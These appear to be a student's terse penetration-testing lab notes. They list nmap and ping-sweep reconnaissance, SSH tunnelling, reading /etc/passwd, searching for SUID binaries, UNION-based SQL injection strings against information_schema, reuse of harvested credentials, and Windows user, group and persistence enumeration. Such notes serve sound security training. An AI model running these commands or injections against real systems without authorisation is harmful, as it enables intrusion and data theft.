- Nmap Scan first box
- Run nmap scripts
- check for robots.txt
- SSH tunnel to web port
- etc/passwd -take not of users
- etc/host - network enum
- etc/networks - network enum
- etc/groups - group infomation
- must beable to access upload location
- prep a loggin
- hit F12, look in the network
- loggin
- Copy RAW into the search bar to perform GET injection
- open browser source code.
SSH to box one
sudo -l
crontab
find / -type -f -perm /4000 -ls 2> /dev/null
-
Ping sweep enummed nework
for i in {1..254}; do ( ping -c 1 <targetnetwork>.$i | grep "bytes from" &); done
-
Nmap scan found boxes
-
Nmap Scripts to enum
-
Tunnel to web port
-
click around to understated SQL works.
-
IN search bar perform GET sql injection
UNION select table_schema,column_name,table_naem from information_Schema.columns; UNION SELECT table_name,1,column_name FROM information_schema.columns; @@version
ssh into box two
SSH into box - use all known creds
Bash
ls /etc/passwd
cat /etc/host
sudo -l
find / -type -f -perm /4000 -ls 2> /dev/null
arp -a
for i in {1..254}; do ( ping -c 1 <targetnetwork>.$i | grep "bytes from" &); done
nmap box four nmap scripts
xfreerdp -windows box with port 3389
net group
net users
whoami
net localgroup
### gui ###
reg edit
run
runonce
services
sch tasks